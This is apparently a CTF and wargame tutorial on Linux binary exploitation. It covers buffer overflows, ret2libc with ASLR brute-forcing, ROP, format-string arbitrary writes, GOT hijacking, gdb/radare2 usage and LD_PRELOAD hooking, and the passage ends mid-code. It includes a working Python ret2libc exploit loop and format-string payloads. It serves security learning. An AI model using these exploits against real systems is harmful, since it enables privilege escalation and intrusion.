Binary Exploitation

This post (Work in Progress) lists the tips and tricks while doing Binary Exploitation challenges during various CTF’s and Over The Wire Wargame.

Thanks to superkojiman, barrebas, et0x who helped me learning the concepts.

Basics

Let’s start with some basic concepts and then we would see some examples which would help to clear the concepts.

  • Big-endian systems store the most significant byte of a word in the smallest address and the least significant byte is stored in the largest address. Little-endian systems, in contrast, store the least significant byte in the smallest address. {% img left /images/big-endian.png 250 250 %} {% img right /images/little-endian.png 250 250 %}

Initial Checks?

When you get a binary for exploitation, we need to find whether it is 32-bit or 64-bit ELF, which platform it is running, whether any buffer overflow prevention techniques has been used, what is EIP offset.

Binary Architecture

Executable binary is running on whether x86 or x86-64.

uname -a

Whether the binary is compiled for 32 bit or 64 bit.

file binary_file

Binary Help?

Probably a good idea to just run the binary with -h or –help flag to check if any help documentation is provided.

$ ./flagXX -h
Usage: php [options] [-f] <file> [--] [args...]
      php [options] -r <code> [--] [args...]

Binary Protection

Multiple Buffer overflow prevention techniques such as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout Randomization (ASLR) and Position Independent Executables (PIE).

Address space Layout Randomization     : Kernel
Executable Stack Protection            : Compiler
Stack smashing protection              : Compiler
Position Independent Executables       : Compiler
Fortify Source                         : Compiler
Stack Protector                        : Compiler
  • Which buffer overflow prevention techniques are used can be found by running Checksec Script. This script is present in gdb-peda.

  • Whether the stack of binary is executable is not can be found by readelf tool. If Program header GNU_STACK has RWE flag, if it has E flag, it’s executable.

narnia8@melinda:~$ readelf -l /narnia/narnia8 | grep GNU_STACK
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10

In order to make the stack executable, the program needs to be compiled with -z execstack option and to disable stack smashing option -fno-stack-protector should be used.

gcc -ggdb -m32 -fno-stack-protector -z execstack -o buffer1 buffer1.c
  • Address Space Layout Randomization (ASLR) controlled by /proc/sys/kernel/randomize_va_space.

Three Values:
0  : Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1  : Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2  : Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

You can change the setting temporarily by writing a new value to /proc/sys/kernel/randomize_va_space, for example:

echo value > /proc/sys/kernel/randomize_va_space

To change the value permanently, add the setting to /etc/sysctl.conf, for example:

kernel.randomize_va_space = value
and run the sysctl -p command.

If you change the value of randomize_va_space, you should test your application stack to ensure that it is compatible with the new setting. If necessary, you can disable ASLR for a specific program and its child processes by using the following command:

% setarch `uname -m` -R program [args ...]
PIE Enabled

If a binary is PIE enabled, we won’t be able to get the addresses until we run it. So, one of the way is to disable ASLR on linux, that way addresses are always the same during analysis.

  • Use the start command in gdb to load the binary and break at _start

  • then use vmmap (if using pwndbg) to see memory layout. If you want the starting address of binary

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555554000     0x555555556000 r-xp     2000 0      /root/work/lucky/lucky
0x555555756000     0x555555757000 r-xp     1000 2000   /root/work/lucky/lucky
0x555555757000     0x555555758000 rwxp     1000 3000   /root/work/lucky/lucky
  • So starting address is 0x555555554000; from here we can set breakpoints by adding the offset in IDA.

  • You can see the offsets in IDA if you go to Options > General and check Line Prefixes

  • Now you can set a breakpoint. Eg if strcpy() is offset 0x123, then you can do

br *0x555555554000+0x123

EIP Offsets?

To know the EIP offset, you can use cyclic patterns. Use pattern_create.rb to create a random pattern which can be used to find the offset and pattern_offset.rb to find the exact offset.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37654136
[*] Exact match at offset 140

others

  • Check all the ways user input is provided to the program.

  • Check all the printf statement, see if there exists a printf that directly prints the user input (possible format string vulnerability).

  • Check how the flag or input is stored? Stack (variable/reading a file?) or heap? (dynamic allocation - malloc).

Integar Overflow

  • A Signed Integer, which has a range between -2,147,483,648 to 2,147,483,647.

  • Signed integers use the first bit to store whether it is negative or positive, 0 indicating positive and 1 indicating negative.

  • What happens if you add 1 to 2,147,483,647 and store the result in a signed integer? Well the first bit goes from 0 to 1, meaning that the number is now negative! In fact, due to the way Two’s Complement, the method used to represent negative numbers in binary, works, it actually wraps around to the most negative integer: -2,147,483,648.

Example

   if(auction_choice == 1){
    printf("These knockoff Flags cost 900 each, enter desired quantity\n");
    int number_flags = 0;
    fflush(stdin);
    scanf("%d", &number_flags);
    if(number_flags > 0){
        int total_cost = 0;
        total_cost = 900*number_flags;
        printf("\nThe final cost is: %d\n", total_cost);
        if(total_cost <= account_balance){
            account_balance = account_balance - total_cost;
            printf("\nYour current balance after transaction: %d\n\n", account_balance);
        }
        else{
            printf("Not enough funds to complete purchase\n");
        }
    }
}
else if(auction_choice == 2){
    printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
    if(bid == 1){

        if(account_balance > 100000){
            print("Flag is XXX Read from file and print")
        else{
            printf("\nNot enough funds for transaction\n\n\n");
        }}

In the above example, if we see our account_balance should be greater than 100000 (inital balance is 1000). Here total_cost is int and having a range of 2,147,483,647 As total_cost = 900*number_flags, we can roughly calculate the number of flags to overflow totalcost by dividing 2,147,483,647 by 900

Buffer overflow

Executable Stack

Either you can put the shellcode on the buffer and then redirect the EIP to NOP Sled followed by the shellcode (provided the shellcode used is correct and the stack is executable).

Non-executable stack, ASLR Disabled

However, if the stack is not executable or the shellcode is not working (happens sometimes), then we can either,

Export a environment variable

  • Export a environment variable with shellcode.

  • Find the address of env variable in the stack. Utilize getenvaddr.c to get the address of the environment variable

---getenvaddr.c---

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
       char *ptr;

       if (argc < 3) {
              printf("Usage: %s <environment var> <target program name>\n", argv[0]);
              exit(0);
       } else {
               ptr = getenv(argv[1]); /* Get environment variable location */
               ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; /* Adjust for program name */
               printf("%s will be at %p\n", argv[1], ptr);
       }
 }
  • Set the return address to starting of the shellcode

  • Get a shell

Return2libc

Use return2libc which is a type of ROP

  • Find the address of system function (Run “gdb -q ./program”; break main; p system)

    gdb -q ./retlib
    (no debugging symbols found)...(gdb)
    (gdb) b main
    Breakpoint 1 at 0x804859e
    (gdb) r
    Starting program: /home/c0ntex/retlib
    (no debugging symbols found)...(no debugging symbols found)...
    Breakpoint 1, 0x0804859e in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x28085260 <system>
    
  • Find the address of “/bin/sh” in the stack or export it in the environment variable and execute it like system(“/bin/sh”). It is in the format of

 <ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>

4Arbitrary Bytes for Return address could be a JUNK address or "\xCC\xCC\xCC\xCC" or address of exit function.

The above pattern is because, when a function is called a stack frame is formed and the parameters for it are pushed onto the stack, followed by the return address(EIP) of your previous function along with your Stack Pointers(ebp, esp). with you Stack Pointer being on top of the frame.

Top of stack              lower memory address

Buffer
....
Saved Frame Pointer (EBP)
Saved Return address (EIP)
Function() arguments
Function() arguements

Bottom of stack          higher memory address

If Return Address set to

  • \xCC\xCC\xCC\xCC so after system executes, it tries to return to 0xcccccccc. \xcc is good just to check if you’re actually jumping to your shellcode, but once you’ve verified that it works, then you should remove it. ret expects an address. not a payload, xCCxCCxCCxCC should be present as a payload.

  • If a JUNK address is put, the binary will have already executed the shellcode but it will segfault.

  • If the proper address of exit() is used, binary will exit cleanly.

It’s better to use /bin/sh instead of /bin/bash since bash drops privs. If /bin/bash is used, it will launch /bin/bash but you’ll find that you haven’t elevated your privileges and this can get confusing. so either find another string that points to /bin/sh or set your own env variable like DASH=/bin/sh and reference that. Good paper to review is Bypassing non-executable-stack during Exploitation (return-to-libc) and Performing a ret2libc Attack

  • Sometimes you need to put a cat to keep the shell alive

(cat input; cat) | ./binary input is the payload you are sending.

Return-Oriented Programming

Msfelfscan can be used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits.

/usr/share/framework2/msfelfscan -f stack7
 Usage: /usr/share/framework2/msfelfscan <input> <mode> <options>
Inputs:
        -f  <file>    Read in ELF file
Modes:
        -j  <reg>     Search for jump equivalent instructions
        -s            Search for pop+pop+ret combinations
        -x  <regex>   Search for regex match
        -a  <address> Show code at specified virtual address
Options:
        -A  <count>   Number of bytes to show after match
        -B  <count>   Number of bytes to show before match
        -I  address   Specify an alternate base load address
        -n            Print disassembly of matched data

We can use msfelfscan to get pop-pop-retun, choose that address and use

pop-pop-ret-addr | 8 bytes junk | address to execute |

where address-to-execute is the address of the environment variable where shellcode is stored.

Non-Executable Stack, ASLR Enabled

If the aslr is enabled, the address for the libc would change everytime, the binary is executed.

for i in `seq 1 5`; do ldd ovrflw | grep libc; done
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb762f000)
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb758f000)
       libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ae000)

However, if we notice the libc address in not changing much, first three characters and last three characters remain the same. Because, the machine we are doing would be probably a CTF machine, so we can brute-force the possible libc address. It is suggested to figure out the offset of system, exit and string “/bin/sh” from the libc base address. Remember,

<ADDRofSYSTEM> <4ArbitraryBytes for Return Address> <argument for system[/bin/sh]>

Find the offset of system, exit and /bin/sh

System

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  246: 00113d70    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
  628: 0003ab40    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
 1461: 0003ab40    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

Exit function

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
  112: 0002ec00    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
  141: 0002e7f0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
  451: 0002ec30   181 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
  559: 000b1645    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
  617: 00116de0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
  652: 00120b60    33 FUNC    GLOBAL DEFAULT   13 quick_exit@GLIBC_2.10
  654: 0002ebd0    33 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.24
  878: 0002ea20    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
 1048: 00120b20    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
 1398: 001b3204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
 1510: 000f4130    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
 2112: 001b3150     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
 2267: 0002e820    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
 2410: 000f54f0     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2

String /bin/sh

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15cdc8 /bin/sh

Now, we know the offset of the system, exit and /bin/sh

 1461: 0003ab40    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
  141: 0002e7f0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
15cdc8 /bin/sh

Creation of exploit

Now, when we have the offset, let’s take a sample libc address and create the exploit

from subprocess import call
import struct

#---Offsets of System, Exit and /bin/sh
libc_base_addr = 0xb75e6000
system_offset  = 0x0003ab40
exit_offset    = 0x0002e7f0
binsh_offset   = 0x0015cdc8

#---Calculation of System, Exit, binsh addr
system_addr = struct.pack("<I",libc_base_addr + system_offset)
exit_addr   = struct.pack("<I",libc_base_addr + exit_offset)
binsh_addr  = struct.pack("<I",libc_base_addr + binsh_offset)

#---Creating the payload
buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += binsh_addr

Calling the targetted binary multiple times

#---Execution of the binary multiple times
i = 0;
while(i<512):
  print "Try :%s" %i
  i = i+1
  ret = call(["/usr/local/bin/ovrflw",buf])

Let’s see a small example where we move an address to eax register and jump to it. Address which we are moving to eax would contain our shellcode.

;test.asm
[SECTION .text]
global _start
_start:
        mov eax, 0xffffd8bc
      jmp eax

Just good to know: global directive is NASM specific. It is for exporting symbols in your code to where it points in the object code generated. Here you mark _start symbol global so its name is added in the object code (a.o). The linker (ld) can read that symbol in the object code and its value so it knows where to mark as an entry point in the output executable. When you run the executable it starts at where marked as _start in the code.

If a global directive missing for a symbol that symbol will not be placed in the object code’s export table so linker has no way of knowing about the symbol. We can compile the asm file by

nasm -f elf test.asm

link it

ld -o test test.o

If you get the below error

ld: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

either

Use 64 bits instead of 32 for your loader and compile it with the following command:

nasm -f elf64 loader.asm -o loader.o

or

If want compile the file as 32 bits composition, you can use:

ld -m elf_i386 -s -o file.o file

To see the byte code

objdump -d <file>
  • What we mostly do when exploiting a buffer overflow (when placing the shellcode on stack) is we place our shellcode before EIP, we should also check if we can put our shellcode after EIP. This is particularly useful when some kind of check for shellcode is present in address before EIP. Example: Suppose our EIP is present at offset 80. We would usually do

python -c 'print "\x90"*50 + "30 Bytes of ShellCode" + "4 Bytes return address to NOP or shellcode in left"'

However, if somekind of check for alphanumeric characters is present for first 80 bytes you won’t be able to put your shellcode in those 80 bytes. At that point of time you should check if you can overflow post EIP and redirect. For example

python -c 'print "A"*80 + "4 Bytes return address to NOP or shellcode in right" + "\x90"*50 + "30 Bytes of ShellCode"'

Format String Vulnerability

Definition

If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present. By doing so, the behaviour of the format function is changed, and the attacker may get control over the target application. A format string is an ASCIIZ string that contains text and format parameters. Example:

printf ("The magic number is: %d\n", 1911);

Behaviour of the format function

The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack.

printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);

From within the printf function the stack looks like:

stack top
. . .
<&a>
<a>
<i>
 A
. . .
stack bottom

Crashing the Program

By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like:

printf ("%s%s%s%s%s%s%s%s%s%s%s%s");

Because ‘%s’ displays memory from an address that is supplied on the stack, where a lot of other data is stored, too, our chances are high to read from an illegal address, which is not mapped.

Viewing the stack

How some parts of the stack memory by using a format string like this:

printf ("%08x.%08x.%08x.%08x.%08x\n");

This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:

40012980.080628c4.bffff7a4.00000005.08059c04

This is a partial dump of the stack memory, starting from the current bottom upward to the top of the stack — assuming the stack grows towards the low addresses.

Viewing Memory at any location

We can look at memory locations different from the stack memory by providing an address to the format string.

Our format string is usually located on the stack itself, so we already have near to full control over the space, where the format string lies. The format function internally maintains a pointer to the stack location of the current format parameter. If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the ‘%s’ parameter. To modify the stack pointer we can simply use dummy parameters that will ‘dig’ up the stack by printing junk:

printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x");

The ‘%08x’ parameters increase the internal stack pointer of the format function towards the top of the stack. After more or less of this increasing parameters the stack pointer points into our memory: the format string itself. The format function always maintains the lowest stack frame, so if our buffer lies on the stack at all, it lies above the current stack pointer for sure. If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending ‘%s’ to our string. In our case the address is illegal and would be ‘AAA0’. Lets replace it with a real one. Example:

address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");

Will dump memory from 0x08480110 until a NUL byte is reached. If we cannot reach the exact format string boundary by using 4-Byte pops (‘%08x’), we have to pad the format string, by prepending one, two or three junk characters. 3 This is analog to the alignment in buffer overflow exploits.

Overwriting of Arbitrary Memory

There is the ‘%n’ parameter, which writes the number of bytes already printed, into a variable of our choice. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. But if we supply a correct mapped and writeable address this works and we overwrite four bytes (sizeof (int)) at the address:

"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"

The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. We have reached one of our goals: we can write to arbitrary addresses. By using a dummy parameter ‘%nu’ we are able to control the counter written by ‘%n’, at least a bit.

Direct Parameter Access

The direct parameter access is controlled by the ‘$’ qualifier

printf ("%6`\ d:raw-latex:`\n`", 6, 5, 4,3, 2, 1);

Prints ‘1’, because the ‘6$’ explicitly addresses the 6th parameter on the stack.

The above text is taken from and a good paper to read for format string is Exploiting Format String Vulnerabilities

Write two bytes

We can write two bytes by %hn and one byte by %hhn.

Write four bytes

How to write four bytes? Suppose we need to write 0x8048706 to the address 0xffffd64c.

HOB:0x0804 LOB:0x8706

If HOB < LOB

[addr+2][addr] = \x4e\xd\xff\xff\x4c\xd\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]`\ hn = %7$hn

python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'

Heap Exploitation

Shared Library

A library whose code segment can be shared among multiple processes and whose data segment is unique to each process is called a Shared Library, thereby saving huge amount of RAM and disk space. Shared library is also referred using other names like dynamic library, shared object files, DSO and DLL(Windows).

Hijack the Global Offset Table with pointers

Definition

The Global Offset Table redirects position independent address calculations to an absolute location and is located in the .got section of an ELF executable or shared object. It stores the final (absolute) location of a function calls symbol, used in dynamically linked code. When a program requests to use printf() for instance, after the rtld locates the symbol, the location is then relocated in the GOT and allows for the executable via the Procedure Linkage Table, to directly access the symbols location.

When you disassemble main and printf statement is present, you will get like

0x080484b9 <+60>: call 0x8048330 printf@plt <----PLT

if you further disassemble printf

gdb-peda$ pdisass printf
Dump of assembler code for function printf@plt:
    0x08048330 <+0>: jmp DWORD PTR ds:0x8049788 <----GOT Address
    0x08048336 <+6>: push 0x0
    0x0804833b <+11>: jmp 0x8048320 End of assembler dump.

Further disassembling the address 0x8049788

gdb-peda$ pdisass 0x8049788
Dump of assembler code from 0x8049788 to 0x80497a8:
  0x08049788 <printf@got.plt+0>:   add    DWORD PTR ss:[eax+ecx*1],0x46
  0x0804978d <fgets@got.plt+1>:    add    DWORD PTR [eax+ecx*1],0x56
  0x08049791 <puts@got.plt+1>: add    DWORD PTR [eax+ecx*1],0x66
  0x08049795 <__gmon_start__@got.plt+1>:   add    DWORD PTR [eax+ecx*1],0x76
  0x08049799 <__libc_start_main@got.plt+1>:    add    DWORD PTR [eax+ecx*1],0x0
  0x0804979d <data_start+1>:   add    BYTE PTR [eax],al
  0x0804979f <data_start+3>:   add    BYTE PTR [eax],al
  0x080497a1 <__dso_handle+1>: add    BYTE PTR [eax],al
  0x080497a3 <__dso_handle+3>: add    BYTE PTR [eax],al
  0x080497a5 <stdin@@GLIBC_2.0+1>: add    BYTE PTR [eax],al
  0x080497a7 <stdin@@GLIBC_2.0+3>: add    BYTE PTR [eax],al
End of assembler dump.

Objdump reflects the same (notice the +1) GOT address:

objdump --dynamic-reloc ./behemoth3

./behemoth3:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049778 R_386_GLOB_DAT    __gmon_start__
080497a4 R_386_COPY        stdin
08049788 R_386_JUMP_SLOT   printf
0804978c R_386_JUMP_SLOT   fgets
08049790 R_386_JUMP_SLOT   puts
08049794 R_386_JUMP_SLOT   __gmon_start__
08049798 R_386_JUMP_SLOT   __libc_start_main

Quick diagram what it looks like:

So a quick diagram of what happens looks kind’a like this:

[printf()] <--------------------------------
   |                                       |
   --------------> [PLT]--->[d_r_resolve]--|
                     |           |         |
                     -------------------->[GOT]<--
                                 |               |
                                  ------->[libc]--

A good paper to read about and from where the definition and diagram is taken is How to Hijack the Global Offset Table with pointers

Tips and Tricks

  • Probably, sometimes, we have to use Socket re-use shellcode

  • To attach to a network process in gdb, you might have to use

gdb-peda$ set follow-fork-mode child
  • If the parent is killed, children become children of the init process (that has the process id 1 and is launched as the first user process by the kernel). The init process checks periodically for new children, and kills them if they have exited (thus freeing resources that are allocated by their return value).

Appendix

GDB Basics

Getting inputs

Taken from Managing inputs for payload injection?

Getting inputs from char *argv[]

We can read the arguments from the initial command line

$> ./program $(python -c 'print("\xef\xbe\xad\xde")')

In gdb, we can pass the arguments through the run command line:

(gdb) run $(python -c 'print("\xef\xbe\xad\xde")')
Getting inputs from a file

We can also provide input from file

$> ./program ./myfile.txt

And, within gdb

(gdb) run myfile.txt

Then, outside of gdb you can rewrite the content of the file and run your program again and again in gdb.

Getting inputs from stdin

Getting the input through stdin can be achieve through a wide variety of functions such as fgets(), scanf(), getline(), read() and others. It raises a few problems because the program stop while executing and wait to be fed with characters.

In case you have to deal with several inputs (eg login, password, …), you need to use separators between the inputs. Usually the separator between each input is just a newline character (n or r depending on the system you are in).

Now, you have two ways of doing to feed the stdin. Either we pass the file

$> cat ./mycommands.txt | ./program

The stdin requires to run the command either through a file

(gdb) run < ./mycommands.txt

And do as said in the previous case.

The other option is to pipe the output of a command to the stdin of the program

$> python -c 'print("\xef\xbe\xad\xde")' | ./program

In gdb we can use the bash process substitution <(cmd) trick:

(gdb) run < <(python -c 'print("\xef\xbe\xad\xde")')

This way is much quicker than effectively creating a named pipe and branch your program on it. Creating the named pipe outside of gdb requires a lot of unnecessary steps where you have it instantly with the previous technique.

Note also that, some people are using <<$(cmd) like this:

(gdb) run <<< $(python -c 'print("\xef\xbe\xad\xde")')

But, this last technique seems to filter out all NULL bytes (for whatever reason), so you should prefer the first one (especially if you want to pass NULL bytes).

Getting inputs from network

We can use netcat nc. Basically, if your vulnerable program is listening on localhost:666 then the command line would be:

$> python -c 'print("\xef\xbe\xad\xde")' | nc -vv localhost 666

Within gdb, the point will be to run (r) the program and to connect to it from another terminal.

Keep the stdin open after injection

Most of the techniques for stdin will send the exploit string to the program which will end shortly after the termination of the input. This mainly happens in gets buffer overflow, so, the stdin should be closed and reopened. The best way to keep it open afterward and get an active shell is to add a cat waiting for input on its stdin. It should look like this if you go though a file:

$> (cat ./mycommands.txt; cat) | ./program

Or, if you want a shell command:

$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | ./program

Or, finally, if you are going through the network:

$> (python -c 'print("\xef\xbe\xad\xde")'; cat) | nc -vv localhost 666

Examining Data

Examining functions

info functions command : Dislays the list of functions in the debugged program

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x00000000000005a0  _init
0x00000000000005d0  setresgid@plt
0x00000000000005e0  system@plt
0x00000000000005f0  printf@plt
0x0000000000000600  getegid@plt
0x0000000000000620  _start
0x0000000000000650  deregister_tm_clones
0x0000000000000690  register_tm_clones
0x00000000000006e0  __do_global_dtors_aux
0x0000000000000720  frame_dummy
0x000000000000072a  vuln
0x0000000000000765  main
0x00000000000007c0  __libc_csu_init
0x0000000000000830  __libc_csu_fini
0x0000000000000834  _fini

Run it before running the program, otherwise all linked functions would also be shown.

Disassembling Functions

GDB

disassemble main

GDB-Peda

pdisass main
Examining Memory

We can use the command x (for “examine”) to examine memory in any of several formats, independently of your program’s data types.

x/nfu addr
x addr
x

Use the x command to examine memory.

n, f, and u are all optional parameters that specify how much memory to display and how to format it; addr is an expression giving the address where you want to start displaying memory.

  • n, the repeat count : The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units u) to display.

  • f, the display format : The display format is one of the formats used by print, ‘s’ (null-terminated string), or ‘i’ (machine instruction). The default is ‘x’ (hexadecimal) initially. The default changes each time you use either x or print.

  • u, the unit size : The unit size is any of

  • b Bytes.

  • h Halfwords (two bytes).

  • w Words (four bytes). This is the initial default.

  • g Giant words (eight bytes).

Examining Data

Sometimes, you need to know the address of the variable, inorder to write arbitary value in to it.

run gdb <program> p &<variablename>

We can also use

(gdb) info address variable_name
Symbol "variable_name" is static storage at 0x903278.

Find the address of a string using GDB?

(gdb) info proc map
process 930
Mapped address spaces:

   Start Addr           End Addr       Size     Offset objfile
     0x400000           0x401000     0x1000        0x0 /myapp
     0x600000           0x601000     0x1000        0x0 /myapp
     0x601000           0x602000     0x1000     0x1000 /myapp
 0x7ffff7a1c000     0x7ffff7bd2000   0x1b6000        0x0 /usr/lib64/libc-2.17.so
 0x7ffff7bd2000     0x7ffff7dd2000   0x200000   0x1b6000 /usr/lib64/libc-2.17.so
 0x7ffff7dd2000     0x7ffff7dd6000     0x4000   0x1b6000 /usr/lib64/libc-2.17.so
 0x7ffff7dd6000     0x7ffff7dd8000     0x2000   0x1ba000 /usr/lib64/libc-2.17.so

 (gdb) find 0x7ffff7a1c000,0x7ffff7bd2000,"/bin/sh"
 0x7ffff7b98489
 1 pattern found.
 (gdb) x /s 0x7ffff7b98489
 0x7ffff7b98489: "/bin/sh"
 (gdb) x /xg 0x7ffff7b98489
 0x7ffff7b98489: 0x0068732f6e69622f
Examining Frames

Here we would interpret GDB “info frame” output?

(gdb) info frame
Stack level 0, frame at 0xb75f7390:
eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a
called by frame at 0xb75f73b0
source language c++.
Arglist at 0xb75f7388, args: this=0x0
Locals at 0xb75f7388, Previous frame's sp is 0xb75f7390
Saved registers:
ebp at 0xb75f7388, eip at 0xb75f738c
  • stack level 0 : frame num in backtrace, 0 is current executing frame, which grows downwards, in consistence with the stack.

  • frame at 0xb75f7390 : starting memory address of this stack frame

  • eip = 0x804877f in base::func() (testing.cpp:16); saved eip 0x804869a : eip is the register for next instruction to execute (also called program counter). so at this moment, the next to execute is at “0x804877f”, which is line 16 of testing.cpp.

  • saved eip “0x804869a” is so called “return address”, i.e., the instruction to resume in caller stack frame after returning from this callee stack. It is pushed into stack upon “CALL” instruction (save it for return).

  • called by frame at 0xb75f73b0 : the address of the caller stack frame

  • source language c++ : which language in use

  • Arglist at 0xb75f7388, args: this=0x0 : the starting address of arguments

  • Locals at 0xb75f7388 : address of local variables.

  • Previous frame’s sp is 0xb75f7390 : this is where the previous frame´s stack pointer point to (the caller frame), at the moment of calling, it is also the starting memory address of called stack frame.

  • Saved registers : These are the two addresses on the callee stack, for two saved registers.

  • ebp at 0xb75f7388 that is the address where the “ebp” register of the caller´s stack frame saved (please note, it is the register, not the caller´s stack address). i.e., corresponding to “PUSH %ebp”. “ebp” is the register usually considered as the starting address of the locals of this stack frame, which use “offset” to address. In another word, the operations of local variables all use this “ebp”, so you will see something like mov -0x4(%ebp), %eax, etc.

  • eip at 0xb75f738c as mentioned before, but here is the address of the stack (which contains the value “0x804877f”).

Examining Registers

We can refer to machine register contents, in expressions, as variables with names starting with ‘$’. The names of registers are different for each machine; use info registers to see the names used on your machine.

  • info registers : Print the names and values of all registers except floating-point registers (in the selected stack frame).

  • info all-registers : Print the names and values of all registers, including floating-point registers.

  • info registers regname … : Print the relativized value of each specified register regname. As discussed in detail below, register values are normally relative to the selected stack frame. regname may be any register name valid on the machine you are using, with or without the initial ‘$’.

Setting program variable

Either

set variable i = 10

or update arbitary (writable) location by address

(gdb) set {int}0x83040 = 4

Radare2 Basics

r2 -Ad ./crackme0x01 : Opens r2 in debug mode with the Analyze all flag active
afll : Lists all functions and their location in memory
s sym.main : Seeks to function sym.main. Address in prompt will change
pdf @ sym.main (which means something like “show me the main function without seek to it”) could be used.

pdf : "Print Disassembling Function"
iz : Shows the strings present in the data section. One can use izz to see the strings for the entire binary
db 0x12345678 : Sets a breakpoint at address 0x12345678. It's possible to set more than one breakpoint
dc : Runs the program until it hits a breakpoint
dr : Shows the content of all registers. Use dr <register> for a specific register
afvd : Shows the content of all local/args variables
pf Prints formatted data. Use pf?? to see available formats and pf??? for examples
? 0x10 Converts the number 0x10 to the most common bases

Appendix-II LD_PRELOAD

Hijacking Functions

Let’s say there’s a function getrand which generates a random path for the files to be stored

int getrand(char **path)
{
 char *tmp;
 int pid;
 int fd;

 srandom(time(NULL));

 tmp = getenv("TEMP");
 pid = getpid();

 asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
   'A' + (random() % 26), '0' + (random() % 10),
   'a' + (random() % 26), 'A' + (random() % 26),
   '0' + (random() % 10), 'a' + (random() % 26));

 fd = open(*path, O_CREAT|O_RDWR, 0600);
 unlink(*path);
 return fd;
}

If we see the above function, getpid figures out the PID of the program, unlink deletes the file and random provides a random number.

We also need to check if the binary is dynamically linked or not?

file /home/flagXX/flagXX
/home/flagXX/flagXX: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

If so, then we can create a c file to override the functions we want – random(), unlink() and getpid():

hacking_randomfile.c

// Take control of random
int random(){
   return 0;
}

// Stop the file being deleted
int unlink(const char *pathname) {
   return 0;
}

// Take control of the reported PID
int getpid() {
